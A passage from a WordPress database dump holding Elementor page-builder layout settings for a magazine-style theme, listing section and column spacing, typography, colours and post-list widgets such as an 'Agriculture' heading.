,\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1289,457,'_elementor_version','0.4'),(1291,458,'_elementor_edit_mode','builder'),(1292,458,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsi